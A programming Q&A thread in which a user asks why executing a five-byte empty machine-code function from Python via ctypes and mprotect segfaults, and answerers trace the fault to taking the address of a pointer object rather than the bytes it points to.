# Machine code of an empty C function, generated with gcc
# Disassembly:
# 55 push %ebp
# 89 e5 mov %esp,%ebp
# 5d pop %ebp
# c3 ret
code = b"\x55\x89\xe5\x5d\xc3"
# Get the address of the code
addr = addressof(c_char_p(code))
# Get the start of the page containing the code and set the permissions
pagesize = 0x1000
pagestart = addr & ~(pagesize - 1)
if mprotect(pagestart, pagesize, PROT_READ|PROT_WRITE|PROT_EXEC):
raise RuntimeError("Failed to set permissions using mprotect()")
# Generate ctypes function object from code
functype = CFUNCTYPE(None)
f = functype(addr)
# Call the function
print("Calling f()")
f()
This code segfaults on the last line.
Why do I get a segfault? The mprotect() call signals success, so I should be permitted to execute code in the page.
Is there a way to fix the code? Can I actually call the machine code in pure Python and inside the current process?
(Some further remarks: I'm not really trying to achieve a goal -- I'm trying to understand how things work. I also tried to use 2*pagesize instead of pagesize in the mprotect() call to rule out the case that my 5 bytes of code fall on a page boundary -- which should be impossible anyway. I used Python 3.1.3 for testing. My machine is a 32-bit i386 box. I know one possible solution would be to create an ELF shared object from pure Python code and load it via ctypes, but that's not the answer I'm looking for :)
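The page arithmetic used for the mprotect() call can be checked in isolation. This is a minimal sketch with made-up helper names (page_start, covering_range); it takes the page size from mmap.PAGESIZE rather than hard-coding 0x1000, and it also computes how many bytes of whole pages are needed to cover a buffer that straddles a page boundary.

```python
import mmap

def page_start(addr, pagesize=mmap.PAGESIZE):
    """Round addr down to the start of its page (pagesize is a power of two)."""
    return addr & ~(pagesize - 1)

def covering_range(addr, length, pagesize=mmap.PAGESIZE):
    """Return (start, size) of the whole pages covering [addr, addr + length)."""
    start = page_start(addr, pagesize)
    last_byte = addr + length - 1
    end = page_start(last_byte, pagesize) + pagesize
    return start, end - start

# Five bytes in the middle of a page need one page ...
print(covering_range(0x12345, 5, 0x1000))
# ... but five bytes starting two bytes before a boundary need two.
print(covering_range(0x12FFE, 5, 0x1000))
```

Passing the computed size instead of a fixed pagesize removes the need to guess whether the buffer crosses a boundary.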
Edit: The following C version of the code is working fine:
#include <sys/mman.h>
char code[] = "\x55\x89\xe5\x5d\xc3";
const int pagesize = 0x1000;
int main()
{
mprotect((int)code & ~(pagesize - 1), pagesize,
PROT_READ|PROT_WRITE|PROT_EXEC);
((void(*)())code)();
}
Edit 2: I found the error in my code. The line
addr = addressof(c_char_p(code))
first creates a ctypes char* pointing to the beginning of the bytes instance code. addressof() applied to this pointer does not return the address this pointer is pointing to, but rather the address of the pointer itself.
The simplest way I managed to figure out to actually get the address of the beginning of the code is
addr = addressof(cast(c_char_p(code), POINTER(c_char)).contents)
Hints for a simpler solution would be appreciated :)
Fixing this line makes the above code "work" (meaning it does nothing instead of segfaulting...).

I did a quick debug on this and it turns out the pointer to the code is
not being correctly constructed, and somewhere internally ctypes is munging
things up before passing the function pointer to ffi_call() which invokes the
code.
Here is the line in ffi_call_unix64() (I'm on 64-bit) where the function pointer is saved
into %r11:
57 movq %r8, %r11 /* Save a copy of the target fn.
When I execute your code, here is the value loaded into %r11 just before
it attempts the call:
(gdb) x/5b $r11
0x7ffff7f186d0: -108 24 -122 0 0
Here is the fix to construct the pointer and call the function:
raw = b"\x55\x89\xe5\x5d\xc3"
code = create_string_buffer(raw)
addr = addressof(code)
Now when I run it I see the correct bytes at that address, and the function
executes fine:
(gdb) x/5b $r11
0x7ffff7f186d0: 0x55 0x89 0xe5 0x5d 0xc3
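The difference between the address of a pointer object and the address it points to can be checked without executing anything. The sketch below reuses the five bytes from the question purely as data; the variable names are illustrative.

```python
import ctypes

raw = b"\x55\x89\xe5\x5d\xc3"

# c_char_p is a pointer object. addressof() gives the location of the
# pointer itself, not the location of the bytes it points to.
ptr = ctypes.c_char_p(raw)
addr_of_pointer = ctypes.addressof(ptr)
addr_of_bytes = ctypes.cast(ptr, ctypes.c_void_p).value

# Reading back from the pointed-to address yields the original bytes.
via_pointer = ctypes.string_at(addr_of_bytes, len(raw))

# create_string_buffer copies the bytes into an array object, so
# addressof() on it is already the address of the data.
buf = ctypes.create_string_buffer(raw)
via_buffer = ctypes.string_at(ctypes.addressof(buf), len(raw))

print(addr_of_pointer != addr_of_bytes, via_pointer == raw, via_buffer == raw)
```

Note that create_string_buffer appends a terminating NUL, so the buffer is one byte longer than the input.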

You might have to flush the instruction cache.
It is unclear (to me, anyway) whether mprotect() automatically does this.
[update]
Of course, had I read the documentation for cacheflush(), I would have seen that it only applies on MIPS (according to the man page).
Assuming this is x86, you might have to invoke the WBINVD (or CLFLUSH) instruction.
In general, self-modifying code needs to flush the i-cache, but as far as I can tell there is no remotely portable way to do so.

I'd suggest you try to get your code working in C first, then translate to ctypes. There's also something like CorePy if you just want to be able to execute assembly from Python.
